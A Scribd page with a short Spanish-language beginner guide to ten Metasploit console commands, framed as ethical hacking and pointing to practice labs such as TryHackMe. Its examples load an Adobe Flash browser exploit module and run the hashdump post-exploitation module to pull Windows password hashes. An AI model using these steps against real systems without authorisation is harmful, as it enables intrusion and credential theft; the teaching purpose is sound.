Scribd
Cargar
54 vistas6 páginas

TOP 10 Comandos de Metasploit

La guía presenta los 10 comandos esenciales de Metasploit para mejorar las pruebas de seguridad en hacking ético. Incluye instrucciones sobre cómo iniciar la consola, buscar módulos, configurar opciones, ejecutar exploits y manejar sesiones. Además, se ofrecen recursos adicionales y un desafío para aplicar lo aprendido.

Cargado por

sjeremy1
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
54 vistas6 páginas

TOP 10 Comandos de Metasploit

La guía presenta los 10 comandos esenciales de Metasploit para mejorar las pruebas de seguridad en hacking ético. Incluye instrucciones sobre cómo iniciar la consola, buscar módulos, configurar opciones, ejecutar exploits y manejar sesiones. Además, se ofrecen recursos adicionales y un desafío para aplicar lo aprendido.

Cargado por

sjeremy1
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

Martín Losada Canedo​ ​ ​ ​ ​ ​ ​ Cybersecurity

Metasploit es una de las herramientas más poderosas en el mundo del hacking ético y
pentesting.​
En esta guía, aprenderás los 10 comandos esenciales para dominar Metasploit y mejorar
tus pruebas de seguridad.

1️⃣ msfconsole
🔹 Inicia la consola principal de Metasploit.
- Ejemplo:

msfconsole

2️⃣ search
🔹 Busca exploits, payloads y módulos en la base de datos de Metasploit.
- Ejemplo:

search windows
search: flash | flash player
search cve:2022

2
Martín Losada Canedo​ ​ ​ ​ ​ ​ ​ Cybersecurity

3️⃣ use
🔹 Carga un módulo de ataque.
- Ejemplo:

use exploit/multi/browser/adobe_flash_shader_drawing_fill

4️⃣ set
🔹 Configura las opciones de un exploit o payload.
- Ejemplo:

set RHOSTS 192.168.1.100


set LHOST 192.168.1.50

5️⃣ show options


🔹 Muestra las opciones configurables de un exploit.
- Ejemplo:

show options

3
Martín Losada Canedo​ ​ ​ ​ ​ ​ ​ Cybersecurity

6️⃣ exploit / run


🔹 Ejecuta el exploit contra el objetivo.
- Ejemplo:

exploit
run

7️⃣ sessions
🔹 Muestra sesiones activas en Metasploit.
- Ejemplo:

sessions

8️⃣ background
🔹 Envía una sesión activa al fondo sin cerrarla.
- Ejemplo:

1- background
2- ctrl + Z

4
Martín Losada Canedo​ ​ ​ ​ ​ ​ ​ Cybersecurity

9️⃣ post
🔹 Ejecuta módulos post-explotación.
- Ejemplo:

use post/windows/gather/hashdump
set SESSION 1
run

🔟 exit / quit
🔹 Cierra Metasploit.
- Ejemplo:

exit
quit

Seguimos…

★​ Conclusión
Con estos 10 comandos esenciales, ya puedes comenzar a utilizar Metasploit como un
profesional.​
Pero esto es solo el inicio. Aquí tienes algunos recursos recomendados:

- Metasploit Unleashed – Curso gratuito de Offensive Security.​


- TryHackMe & HackTheBox – Plataformas para practicar ataques con Metasploit.

5
Martín Losada Canedo​ ​ ​ ​ ​ ​ ​ Cybersecurity

★​ DESAFÍO:
Ahora que conoces estos comandos, te reto a encontrar una máquina vulnerable en
TryHackMe y explotarla usando Metasploit.

¿Aceptas el reto?

También podría gustarte